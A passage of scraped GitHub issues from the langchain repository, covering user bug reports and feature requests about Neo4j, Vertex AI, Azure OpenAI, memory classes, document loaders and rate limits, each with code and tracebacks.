File "D:\Anaconda3\envs\langchain\lib\site-packages\neo4j\_sync\io\_bolt3.py", line 200, in run
    raise ConfigurationError(
neo4j.exceptions.ConfigurationError: Database name parameter for selecting database is not supported in Bolt Protocol Version(3, 0). Database name 'neo4
```
### Suggestion:
_No response_ | Issue: When implementing Cypher Search using neo4j environment | https://api.github.com/repos/langchain-ai/langchain/issues/7346/comments | 5 | 2023-07-07T13:00:11Z | 2023-10-28T16:05:40Z | https://github.com/langchain-ai/langchain/issues/7346 | 1,793,511,650 | 7,346 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I am looking to load an OpenAPI YAML file into a Vertex AI LLM model. LangChain provides this for OpenAI but not for Vertex AI. This is how I currently write the code with OpenAI, and I want similar functionality for Vertex AI:

```python
spec = OpenAPISpec.from_file("sample.yaml")
openai_fns, call_api_fn = openapi_spec_to_openai_fn(spec)
```
### Motivation
I am creating a GenAI chatbot for my company where customers can ask questions specific to our product. I need to return the answers to those queries using our internal APIs. To query those APIs, I need to know which API to call and have the API parameters filled in according to the user query. For that, I need Vertex AI function-calling support.
Is there already a way in Vertex AI that does this? Kindly help me on this.
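Until such support exists, a crude stand-in is to select the operation yourself; the sketch below (all names hypothetical) picks the spec operation whose description overlaps the query most, which a real function-calling model would do far better:

```python
def pick_operation(operations, query):
    """Pick the operation whose description shares the most words with the query."""
    def overlap(desc):
        return len(set(desc.lower().split()) & set(query.lower().split()))
    return max(operations, key=lambda op: overlap(op["description"]))

ops = [
    {"name": "get_order_status", "description": "look up the status of an order"},
    {"name": "list_products", "description": "list available products"},
]
print(pick_operation(ops, "what is the status of my order 123?")["name"])  # get_order_status
```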
### Your contribution
I can help on the issue if anything is required. | Load OPEN API yaml file to vertex ai LLM model | https://api.github.com/repos/langchain-ai/langchain/issues/7345/comments | 1 | 2023-07-07T12:36:51Z | 2023-10-14T20:10:17Z | https://github.com/langchain-ai/langchain/issues/7345 | 1,793,476,844 | 7,345 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I want to download a large file, 5,000,000 characters, and I get an error: openai.error.RateLimitError: Rate limit reached for default-text-embedding-ada-002 in organization org-DOqIVFPozlLEOcvlTbpvpcKt on tokens per min. Limit: 150000 / min. Current: 0 / min. Contact us through our help center at help.openai.com if you continue to have issues. Please add a payment method to your account to increase your rate limit. Visit https://platform.openai.com/account/billing to add a payment method.
My code:
```python
class Agent:
    def __init__(self, openai_api_key: str | None = None) -> None:
        self.key = openai_api_key
        self.embeddings = OpenAIEmbeddings(openai_api_key=openai_api_key, request_timeout=120, max_retries=10)
        self.text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
        self.llm = ChatOpenAI(temperature=0, openai_api_key=openai_api_key, max_tokens=500, model_name="gpt-3.5-turbo-16k")
        self.chat_history = None
        self.chain = None
        self.db = None

    def ask(self, question: str) -> str:
        response = self.chain({"question": question, "chat_history": self.chat_history})
        response = response["answer"].strip()
        self.chat_history.append((question, response))
        return response

    def ingest(self, file_path) -> None:
        loader = TextLoader(file_path, encoding="utf-8")
        documents = loader.load()
        splitted_documents = self.text_splitter.split_documents(documents)
        if self.db is None:
            self.db = FAISS.from_documents(splitted_documents, self.embeddings)
            self.chain = ConversationalRetrievalChain.from_llm(self.llm, self.db.as_retriever())
            self.chat_history = []
        else:
            self.db.add_documents(splitted_documents)

    def forget(self) -> None:
        self.db = None
        self.chain = None
        self.chat_history = None
```
Is there a solution to this problem?
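Common workarounds are batching the embedding calls and backing off on rate-limit errors. A stdlib sketch (the `embed_batch` callable is a hypothetical stand-in for whatever hits the API; `RuntimeError` stands in for `openai.error.RateLimitError`):

```python
import time

def embed_in_batches(texts, embed_batch, batch_size=100, delay_s=1.0, max_retries=5):
    """Embed texts in slices, sleeping between batches and retrying with
    exponential backoff when the backend signals a rate limit."""
    results = []
    for i in range(0, len(texts), batch_size):
        batch = texts[i:i + batch_size]
        for attempt in range(max_retries):
            try:
                results.extend(embed_batch(batch))
                break
            except RuntimeError:                     # stand-in for RateLimitError
                time.sleep(delay_s * 2 ** attempt)   # exponential backoff
        else:
            raise RuntimeError("giving up after repeated rate limits")
        time.sleep(delay_s)                          # pace requests between batches
    return results

# Fake backend that fails once, then succeeds:
calls = {"n": 0}
def fake_embed(batch):
    calls["n"] += 1
    if calls["n"] == 1:
        raise RuntimeError("rate limited")
    return [len(t) for t in batch]

out = embed_in_batches(["aa", "bbb"], fake_embed, batch_size=1, delay_s=0)
print(out)  # [2, 3]
```

`OpenAIEmbeddings` also has a `chunk_size` parameter controlling how many texts go per request, which may be worth lowering in tandem.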
### Suggestion:
_No response_ | Issue: openai.error.RateLimitError: Rate limit reached for default-text-embedding-ada-002 in organization | https://api.github.com/repos/langchain-ai/langchain/issues/7343/comments | 20 | 2023-07-07T11:34:51Z | 2024-03-12T03:27:18Z | https://github.com/langchain-ai/langchain/issues/7343 | 1,793,386,363 | 7,343 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Inferring query filters from natural language is powerful. The SelfQuery retriever is a great implementation but is not yet compatible with Elasticseach.
### Motivation
Choosing Elasticsearch as a vector store is interesting in terms of hybrid search.
It also makes sense when you have an established infrastructure and technical expertise.
### Your contribution
cc: @jeffvestal, @derickson | Create a built in translator for SelfQueryRetriever for Elasticsearch | https://api.github.com/repos/langchain-ai/langchain/issues/7341/comments | 2 | 2023-07-07T10:53:34Z | 2023-11-21T16:06:47Z | https://github.com/langchain-ai/langchain/issues/7341 | 1,793,313,012 | 7,341 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain v0.0.225, Ubuntu 22.04.2 LTS, Python 3.10
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm executing the [gpt4all notebook](https://github.com/hwchase17/langchain/blob/master/docs/extras/modules/model_io/models/llms/integrations/gpt4all.ipynb) code on my local machine; the IDE is VSCode.
Getting this error - **AttributeError: 'Model' object has no attribute '_ctx'**

### Expected behavior

| langchain + gpt4all | https://api.github.com/repos/langchain-ai/langchain/issues/7340/comments | 6 | 2023-07-07T10:43:13Z | 2023-11-28T16:09:46Z | https://github.com/langchain-ai/langchain/issues/7340 | 1,793,294,393 | 7,340 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hello everyone,
I've tried numerous approaches, but every time I attempt to transcribe a YouTube video, the Whisper task gets terminated.
Does anyone have any suggestions?
```
def youtube_transcript(query: str) -> str:
# Use the URL of the YouTube video you want to download
youtube_url = [get_input_writing(query)]
# -------------
# Directory to save audio files
save_dir = "/home/ds_logos_2/transcripts"
# Transcribe the videos to text
loader = GenericLoader(YoutubeAudioLoader(youtube_url, save_dir), OpenAIWhisperParser())
docs = loader.load()
# Combine doc
combined_docs = [doc.page_content for doc in docs]
text = " ".join(combined_docs)
# Save the transcription to a text file
with open('/home/davesoma/transcripts/transcript.txt', 'w') as f:
f.write(text)
```
```
[youtube] -hxeDjAxvJ8: Downloading webpage
[youtube] -hxeDjAxvJ8: Downloading ios player API JSON
[youtube] -hxeDjAxvJ8: Downloading android player API JSON
[youtube] -hxeDjAxvJ8: Downloading m3u8 information
[info] -hxeDjAxvJ8: Downloading 1 format(s): 140
[download] Destination: /home/davesoma/ds_logos_2/transcripts/Marc Andreessen: Future of the Internet, Technology, and AI | Lex Fridman Podcast #386.m4a
[download] 100% of 177.41MiB in 00:00:18 at 9.52MiB/s
[FixupM4a] Correcting container of "/home/davesoma/ds_logos_2/transcripts/Marc Andreessen: Future of the Internet, Technology, and AI | Lex Fridman Podcast #386.m4a"
[ExtractAudio] Not converting audio /home/davesoma/ds_logos_2/transcripts/Marc Andreessen: Future of the Internet, Technology, and AI | Lex Fridman Podcast #386.m4a; file is already in target format m4a
Transcribing part 1!
Killed
``` | Issue: Whisper terminates YouTube transcriptions. | https://api.github.com/repos/langchain-ai/langchain/issues/7339/comments | 3 | 2023-07-07T10:39:03Z | 2023-10-14T20:10:22Z | https://github.com/langchain-ai/langchain/issues/7339 | 1,793,287,416 | 7,339 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I have been trying to delete custom Redis data using LangChain, but the search feature only returns the document and the metadata with a similarity score. Hence I modified the code to return the document ID along with the document data. The ID will be helpful for manual deletion of certain elements.
### Motivation
The retrieval of the document ID from the Redis semantic search will help me systematically replace wrong data with right data after filtering it using LLMs.
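For illustration, one possible shape for the extended return value (all names hypothetical — a three-tuple instead of the current `(document, score)` pair):

```python
def similarity_search_with_score_and_id(results):
    """results: raw hits like {"id": ..., "content": ..., "score": ...}.

    Include the Redis key alongside each (document, score) pair so callers
    can delete or update by id afterwards.
    """
    return [
        ({"page_content": hit["content"]}, hit["score"], hit["id"])
        for hit in results
    ]

hits = [{"id": "doc:42", "content": "hello", "score": 0.12}]
for doc, score, doc_id in similarity_search_with_score_and_id(hits):
    print(doc_id, score)   # doc:42 0.12
```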
### Your contribution
Yes I have fixed the redis part to retrieve the document ID from semantic search. I will fix the issue if the pull request is allowed. | Add feature to get document ID from redis after redis search document retrieval. | https://api.github.com/repos/langchain-ai/langchain/issues/7338/comments | 2 | 2023-07-07T10:29:51Z | 2023-10-06T16:04:59Z | https://github.com/langchain-ai/langchain/issues/7338 | 1,793,271,619 | 7,338 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I am doing the pdf question answering using the below code.
Note: I am integrated the ConversationBufferMemory for keeping my chat in the memory
```
from langchain.document_loaders import PyPDFLoader
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.memory import ConversationBufferMemory
from langchain.vectorstores import Chroma
from langchain.chains import ConversationalRetrievalChain
from langchain.llms import Cohere
import os
os.environ["COHERE_API_KEY"] = "cohere key"
model = Cohere(model="command-xlarge")
embeddings = HuggingFaceEmbeddings(model_name='sentence-transformers/all-MiniLM-L6-v2')
pdf_path = "file.pdf"
loader = PyPDFLoader(pdf_path)
pages = loader.load_and_split()
vectordb = Chroma.from_documents(pages, embedding=embeddings,
persist_directory=".")
vectordb.persist()
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
pdf_qa = ConversationalRetrievalChain.from_llm(model, vectordb.as_retriever(), memory=memory)
while True:
query = input("Enter the question\n")
result = pdf_qa({"question": query})
print("Answer:")
print(result["answer"])
```
What is actually happening here?
I am observing that the memory is not being updated, because if I ask a question related to the previous context, it is unable to answer.
Is my method correct?
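For context on what the chain does internally: `ConversationalRetrievalChain` first condenses the follow-up question together with the chat history into a standalone question, then retrieves. A plain-Python sketch of that loop (the `condense` function is a toy stand-in for the LLM rewriting step):

```python
class Memory:
    def __init__(self):
        self.chat_history = []

    def save(self, question, answer):
        self.chat_history.append((question, answer))

def condense(history, question):
    # toy stand-in: a real chain asks the LLM to rewrite the follow-up
    context = " ".join(q + " " + a for q, a in history)
    return (context + " " + question).strip()

mem = Memory()
mem.save("Who wrote the report?", "Alice wrote it.")
print(condense(mem.chat_history, "When did she write it?"))
# Who wrote the report? Alice wrote it. When did she write it?
```

If follow-ups fail, the first thing to verify is that each turn is actually written back to the memory — e.g. by printing `memory.chat_memory.messages` after every call.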
### Suggestion:
_No response_ | Working of ConversationBufferMemory in the context of document based question answering | https://api.github.com/repos/langchain-ai/langchain/issues/7337/comments | 1 | 2023-07-07T10:12:08Z | 2023-10-14T20:10:27Z | https://github.com/langchain-ai/langchain/issues/7337 | 1,793,238,048 | 7,337 |
[
"langchain-ai",
"langchain"
I want to pass "chat_history" to the agents like:
```python
...
agent = initialize_agent(tools, llm, agent=AgentType.OPENAI_FUNCTIONS, verbose=True)
response = agent.run({"input": {"chat_history": _message_to_tuple(history), "question": query}})
```
but got an error. How can I pass 'chat_history' to the agent?
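One workaround (independent of any particular agent API) is to flatten the history into the input string yourself; the helpers below are hypothetical:

```python
def format_history(history):
    """history: list of (role, text) tuples -> one prompt prefix string."""
    return "\n".join(f"{role}: {text}" for role, text in history)

def build_agent_input(history, question):
    return f"{format_history(history)}\nHuman: {question}" if history else question

history = [("Human", "Hi"), ("AI", "Hello!")]
print(build_agent_input(history, "What did I just say?"))
```

Alternatively, `initialize_agent` accepts a `memory=` object in recent LangChain versions, which keeps the history out of `input` entirely.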
### Suggestion:
_No response_ | Issue: question about agents | https://api.github.com/repos/langchain-ai/langchain/issues/7336/comments | 6 | 2023-07-07T09:49:22Z | 2023-10-19T16:06:33Z | https://github.com/langchain-ai/langchain/issues/7336 | 1,793,196,340 | 7,336 |
[
"langchain-ai",
"langchain"
] | ### System Info
Hello,
I am trying to use AzureChatOpenAI to develop a QA system with memory. For that purpose, I have the following code:
```python
import faiss
import pickle
from langchain.chat_models import AzureChatOpenAI
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationalRetrievalChain
from langchain.schema import HumanMessage
memory = ConversationBufferMemory(
memory_key="chat_history",
return_messages=True
)
# Load the LangChain.
index = faiss.read_index("docs.index")
with open("faiss_store.pkl", "rb") as f:
store = pickle.load(f)
AZURE_BASE_URL = "{MY_BASE_URL}.openai.azure.com/"
AZURE_OPENAI_API_KEY = "MY_API_KEY"
DEPLOYMENT_NAME = "chat"
llm = AzureChatOpenAI(
openai_api_base=AZURE_BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name="chat",
openai_api_key=AZURE_OPENAI_API_KEY,
openai_api_type="azure",
temperature=0.01
)
retriever = store.as_retriever()
qa = ConversationalRetrievalChain.from_llm(
llm,
retriever=retriever,
memory=memory
)
user_input = "Question?"
result = qa({"question": user_input})
print(result)
```
This code is raising the following error:
```
openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.
```
I have tried using AzureChatOpenAI in other ways and it is working without any problem, using the same deployed model in Azure:
```python
AZURE_BASE_URL = "{MY_BASE_URL}.openai.azure.com/"
AZURE_OPENAI_API_KEY = "MY_API_KEY"
DEPLOYMENT_NAME = "chat"
llm = AzureChatOpenAI(
openai_api_base=AZURE_BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name="chat",
openai_api_key=AZURE_OPENAI_API_KEY,
openai_api_type="azure",
temperature=0.01
)
chain = load_qa_chain(llm=llm, chain_type="map_reduce")
```
Therefore, the problem is not about the deployment I made in Azure, it seems to work fine in other situations.
Am I missing something when using ConversationalRetrievalChain with AzureChatOpenAI? I have tried so many things and nothing seems to work.
Thanks in advance for any help.
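One possible explanation (an assumption on my part, not confirmed by the traceback): `ConversationalRetrievalChain` also calls the embeddings object pickled inside the FAISS store, and if that `OpenAIEmbeddings` instance is not configured for an Azure deployment, it can raise this same "deployment does not exist" error even though the chat model is set up correctly. A small helper to reconstruct the URL each component will actually request can help pinpoint which deployment name is wrong:

```python
def azure_chat_endpoint(api_base: str, deployment: str, api_version: str) -> str:
    """Rebuild the REST URL the Azure OpenAI SDK will call, so a wrong
    deployment name is easy to spot before running the chain."""
    base = api_base if api_base.startswith("http") else "https://" + api_base
    return (
        f"{base.rstrip('/')}/openai/deployments/{deployment}"
        f"/chat/completions?api-version={api_version}"
    )

# e.g. compare this against the deployments listed in the Azure portal
print(azure_chat_endpoint("myresource.openai.azure.com/", "chat", "2023-03-15-preview"))
```

If the printed URL for the embeddings component names a deployment that does not exist in the Azure resource, that would explain why only the retrieval chain fails.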
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [x] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Declare the LLM using AzureChatOpenAI:
```python
AZURE_BASE_URL = "{MY_BASE_URL}.openai.azure.com/"
AZURE_OPENAI_API_KEY = "MY_API_KEY"
DEPLOYMENT_NAME = "chat"
llm = AzureChatOpenAI(
openai_api_base=AZURE_BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name="chat",
openai_api_key=AZURE_OPENAI_API_KEY,
openai_api_type="azure",
temperature=0.01
)
```
2. Declare the ConversationBufferMemory:
```python
memory = ConversationBufferMemory(
memory_key="chat_history",
return_messages=True
)
```
3. Load FAISS index:
```python
# Load the LangChain.
index = faiss.read_index("docs.index")
with open("faiss_store.pkl", "rb") as f:
store = pickle.load(f)
```
4. Declare and run the ConversationalRetrievalChain:
```python
qa = ConversationalRetrievalChain.from_llm(
llm,
retriever=retriever,
memory=memory
)
user_input = "Question?"
result = qa({"question": user_input})
print(result)
```
### Expected behavior
Error raised:
```
openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.
``` | AzureChatOpenAI raises The API deployment for this resource does not exist when used with ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7331/comments | 3 | 2023-07-07T08:41:48Z | 2024-02-20T21:07:36Z | https://github.com/langchain-ai/langchain/issues/7331 | 1,793,084,323 | 7,331 |
[
"langchain-ai",
"langchain"
] | ### System Info
I intend to use ConversationSummaryBufferMemory with ChatOpenAI in a conversation chain. For the chat, I need to set a system message to instruct the assistant and give it an appropriate personality. However, a system message cannot be inserted into the memory either via `save_context` (the documented way) or via `memory.chat_memory.messages.insert()`.
The summary of the chat itself seems to use the system message slot to deliver the summary. This makes ConversationSummaryBufferMemory incompatible with ChatOpenAI.
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Using either of the two methods to use the system message
1. memory.chat_memory.messages.insert(0, system_message)
2. memory.save_context({"input": SystemMessage(content=system_message)}, {"output": ""})
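The layout I'm after can be sketched in plain Python (the dict shapes here are illustrative, not LangChain's actual message classes): keep the fixed system message outside the memory buffer and prepend it on every call, so the summarizer's own system-message slot is never contested:

```python
def build_messages(system_prompt, buffered_history, user_input):
    """Prepend a fixed system message that never enters the memory buffer,
    leaving the buffer (and its summary) free of system entries."""
    messages = [{"role": "system", "content": system_prompt}]
    messages.extend(buffered_history)  # e.g. summary + recent turns
    messages.append({"role": "user", "content": user_input})
    return messages
```

Something along these lines is what a prompt-template-based workaround would do, but it would be better if the memory classes supported it directly.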
### Expected behavior
We should be able to use any memory with ChatOpenAI as these need to be modular but ConversationSummaryBufferMemory seems incompatible with it due to system message. | Conversation Summary Buffer Memory does not accept a system message | https://api.github.com/repos/langchain-ai/langchain/issues/7327/comments | 8 | 2023-07-07T07:27:42Z | 2024-07-29T01:54:55Z | https://github.com/langchain-ai/langchain/issues/7327 | 1,792,965,212 | 7,327 |
[
"langchain-ai",
"langchain"
I've got a GoogleDriveLoader implemented with exponential backoff and a sleep call to try to further mitigate rate limits, but I still get rate limit errors from Google.
Even though I've added a `time.sleep(5)` statement, I assume it only takes effect before each attempt to load all the documents, not between individual API calls within the `load()` method.
```
google_loader = GoogleDriveLoader(
folder_id="xxxxxxxxx",
credentials_path="credentials.json",
token_path="token.json",
file_types=["document", "sheet", "pdf"],
file_loader_cls=UnstructuredFileIOLoader,
recursive=True,
verbose=True,
)
@retry(
stop=stop_after_attempt(7), wait=wait_exponential(multiplier=2, min=60, max=300)
)
def load_documents():
time.sleep(5) # delay for 5 seconds
return google_loader.load()
try:
google_docs = load_documents()
except:
logging.error("Exceeded retry attempts for Google API rate limit.")
raise
```
The exception output:
```
ERROR:root:Exceeded retry attempts for Google API rate limit.
IndexError: list index out of range
```
Stacktrace:
```
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/A_xx?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/A_xx?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/A_xx?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/BF%20IS?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/BF%20BS%20?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Reporting%20IS?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Reporting%20BS?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Statistics?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Val_Summary?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Val_Workings?alt=json
ERROR:root:Exceeded retry attempts for Google API rate limit.
Traceback (most recent call last):
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 382, in __call__
result = fn(*args, **kwargs)
File "/Users/chris/Repositories/xxxx/ingest.py", line 44, in load_documents
return google_loader.load()
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/langchain/document_loaders/googledrive.py", line 347, in load
return self._load_documents_from_folder(
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/langchain/document_loaders/googledrive.py", line 248, in _load_documents_from_folder
returns.extend(self._load_sheet_from_id(file["id"])) # type: ignore
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/langchain/document_loaders/googledrive.py", line 173, in _load_sheet_from_id
header = values[0]
IndexError: list index out of range
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/chris/Repositories/xxxx/ingest.py", line 68, in <module>
ingest_docs()
File "/Users/chris/Repositories/xxxx/ingest.py", line 47, in ingest_docs
google_docs = load_documents()
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 289, in wrapped_f
return self(f, *args, **kw)
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 379, in __call__
do = self.iter(retry_state=retry_state)
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 326, in iter
raise retry_exc from fut.exception()
tenacity.RetryError: RetryError[<Future at 0x142dfab30 state=finished raised IndexError>]
```
### Suggestion:
Due to the recursive function, and the use case for most people being to load a large Drive folder, would it be possible to implement a rate limiter into the loader itself to slow down the individual API calls?
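For what it's worth, the final traceback above is an `IndexError` from `_load_sheet_from_id` (`header = values[0]`), which looks like an empty sheet range rather than a 429 — the retry wrapper may be masking that. Still, spacing out the individual calls seems worth trying; a minimal limiter that could wrap each request (a hypothetical integration point, since the loader doesn't currently expose per-call hooks) might look like:

```python
import time


class MinIntervalLimiter:
    """Block until at least `min_interval` seconds have passed since the
    previous call, spacing out successive API requests."""

    def __init__(self, min_interval: float):
        self.min_interval = min_interval
        self._last = float("-inf")  # first call never sleeps

    def wait(self) -> None:
        now = time.monotonic()
        sleep_for = self.min_interval - (now - self._last)
        if sleep_for > 0:
            time.sleep(sleep_for)
        self._last = time.monotonic()
```

If the loader called `limiter.wait()` before each Drive/Sheets request, bursts would be smoothed out without the coarse per-`load()` delay above.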
Alternatively, does anyone have any recommendations on how to better implement an exponential backoff? | Issue: Rate limiting on large Google Drive folder | https://api.github.com/repos/langchain-ai/langchain/issues/7325/comments | 3 | 2023-07-07T06:06:08Z | 2023-12-30T16:07:34Z | https://github.com/langchain-ai/langchain/issues/7325 | 1,792,853,218 | 7,325 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I used `RecursiveCharacterTextSplitter.from_tiktoken_encoder` to split a document. If I set chunk_size to 2000, OpenAI cannot answer my question from the documents; if I set it to 500, it works very well. As a rule of thumb, what is the best chunk size?
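There's no single right answer — it depends on the embedding model, the retriever's `k`, and the LLM context window — but the trade-off is easy to see with a naive character chunker (illustrative only; `from_tiktoken_encoder` counts tokens, not characters). Smaller chunks give the retriever more, tighter candidates; bigger chunks dilute the embedding and may push relevant text past the prompt budget:

```python
def chunk_text(text: str, chunk_size: int, overlap: int = 0) -> list[str]:
    """Naive character-based chunker showing the size/overlap trade-off."""
    assert 0 <= overlap < chunk_size
    chunks, start = [], 0
    while start < len(text):
        chunks.append(text[start:start + chunk_size])
        start += chunk_size - overlap
    return chunks
```

With a fixed retriever `k`, halving the chunk size roughly halves the context the chain stuffs into the prompt, which is one plausible reason 500 outperforms 2000 here.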
### Suggestion:
_No response_ | What is the best size for a chunk | https://api.github.com/repos/langchain-ai/langchain/issues/7322/comments | 2 | 2023-07-07T05:42:08Z | 2023-10-14T20:10:37Z | https://github.com/langchain-ai/langchain/issues/7322 | 1,792,823,901 | 7,322 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain version: v0.0.225
Python Version: 3.10
Deployed and running on AWS Lambda deployed with x86_64 architecture.
### Who can help?
@jacoblee93
### Information
- [x] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
def callChatModel(input, token):
    print('Executing with input:', input)
    llm = ChatOpenAI(model="gpt-3.5-turbo-0613",
                     temperature=0)
    history = DynamoDBChatMessageHistory(table_name="MemoryPy",
                                         session_id=token)
    memory = ConversationBufferWindowMemory(
        k=20, memory_key='chat_history', chat_memory=history, input_key="input", return_messages=True)
    zapier = ZapierNLAWrapper(zapier_nla_oauth_access_token=token)
    zapier_toolkit = ZapierToolkit.from_zapier_nla_wrapper(zapier)
    tools = load_tools(["serpapi"], llm=llm) + zapier_toolkit.tools
    print(tools)
    agent = initialize_agent(
        tools, llm,
        agent=AgentType.OPENAI_FUNCTIONS,
        memory=memory,
        verbose=True,
        handle_parsing_errors=True,
    )
    resp = agent.run(input=input)
    return resp
```
Input to the chat model is
`Executing with input: Look up a basic fact about the sun, no more than one sentence. Send this fact to <email>@gmail.com `
Execution logs from CloudWatch:
```
[1m> Entering new chain...[0m
[ERROR] InvalidRequestError: 'Gmail: Send Email' does not match '^[a-zA-Z0-9_-]{1,64}<!--EndFragment-->
</body>
</html> - 'functions.1.name'Traceback (most recent call last): File "/var/task/handler.py", line 152, in handle_chat chatResp = callChatModel(message, token) File "/var/task/handler.py", line 92, in callChatModel resp = agent.run(input=input) File "/var/task/langchain/chains/base.py", line 320, in run return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[ File "/var/task/langchain/chains/base.py", line 181, in __call__ raise e File "/var/task/langchain/chains/base.py", line 175, in __call__ self._call(inputs, run_manager=run_manager) File "/var/task/langchain/agents/agent.py", line 987, in _call next_step_output = self._take_next_step( File "/var/task/langchain/agents/agent.py", line 792, in _take_next_step output = self.agent.plan( File "/var/task/langchain/agents/openai_functions_agent/base.py", line 210, in plan predicted_message = self.llm.predict_messages( File "/var/task/langchain/chat_models/base.py", line 398, in predict_messages return self(messages, stop=_stop, **kwargs) File "/var/task/langchain/chat_models/base.py", line 348, in __call__ generation = self.generate( File "/var/task/langchain/chat_models/base.py", line 124, in generate raise e File "/var/task/langchain/chat_models/base.py", line 114, in generate self._generate_with_cache( File "/var/task/langchain/chat_models/base.py", line 261, in _generate_with_cache return self._generate( File "/var/task/langchain/chat_models/openai.py", line 371, in _generate response = self.completion_with_retry(messages=message_dicts, **params) File "/var/task/langchain/chat_models/openai.py", line 319, in completion_with_retry return _completion_with_retry(**kwargs) File "/var/task/tenacity/__init__.py", line 289, in wrapped_f return self(f, *args, **kw) File "/var/task/tenacity/__init__.py", line 379, in __call__ do = self.iter(retry_state=retry_state) File "/var/task/tenacity/__init__.py", line 314, in iter return fut.result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 451, 
in result return self.__get_result() File "/var/lang/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result raise self._exception File "/var/task/tenacity/__init__.py", line 382, in __call__ result = fn(*args, **kwargs) File "/var/task/langchain/chat_models/openai.py", line 317, in _completion_with_retry return self.client.create(**kwargs) File "/var/task/openai/api_resources/chat_completion.py", line 25, in create return super().create(*args, **kwargs) File "/var/task/openai/api_resources/abstract/engine_api_resource.py", line 153, in create response, _, api_key = requestor.request( File "/var/task/openai/api_requestor.py", line 298, in request resp, got_stream = self._interpret_response(result, stream) File "/var/task/openai/api_requestor.py", line 700, in _interpret_response self._interpret_response_line( File "/var/task/openai/api_requestor.py", line 763, in _interpret_response_line raise self.handle_error_response( | [ERROR] InvalidRequestError: 'Gmail: Send Email' does not match '^[a-zA-Z0-9_-]{1,64}<!--EndFragment-->
</body>
